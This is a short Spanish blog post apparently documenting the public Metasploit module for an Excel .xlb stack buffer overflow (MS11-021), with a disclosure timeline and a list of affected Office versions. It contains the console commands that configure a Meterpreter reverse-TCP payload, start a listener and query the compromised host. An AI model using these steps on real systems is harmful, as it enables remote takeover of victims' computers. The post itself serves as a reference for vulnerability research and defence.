Descripción:
Este módulo se aprovecha de una vulnerabilidad en Excel de Microsoft Office 2007. Mediante el suministro de un archivo con formato incorrecto *.xlb, un atacante puede controlar el contenido (código) de una rutina de memcpy, y el número de bytes a copiar, causando un stack- based buffer overflow. Esto da como resultado la ejecución de código arbitrario.
use exploit/windows/fileformat/ms11_021_xlb_bof
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
getuid
sysinfo
Línea de tiempo:
Vulnerabilidad descubierta y reportado a la ZDI por Aniway
Vulnerabilidad reportada al proveedor por ZDI el 18/10/2010
Liberación coordinada de la vulnerabilidad del 04/12/2011
Metasploit PoC de proporcionado el 11/05/2011
PoC proporcionada por:
Aniway
abysssec
sinn3r
juan vazquez
Referencias:
Versiones afectadas:
Microsoft Office XP Service Pack 3
Microsoft Office 2003 Service Pack 3
Microsoft Office 2007 Service Pack 2
Microsoft Office 2010 (32 y 64 bits edición)
Microsoft Office 2004 para Mac
Microsoft Office 2008 para Mac
Microsoft Office 2011 para Mac
Abrir archivos con formatos XML para Mac
Microsoft Excel Viewer Service Pack 2
Microsoft Office Compatibility Pack para Word, Excel y PowerPoint 2007 con Service Pack 2
Probado en Windows XP Pro SP3 con:
Microsoft Office Excel 2007 (12.0.4518.014)
Fuente: http://eromang.zataz.com/
Ingeniero, me gusta la cyberseguridad, la programación y el blockchain.
0 Notaciones:
Publicar un comentario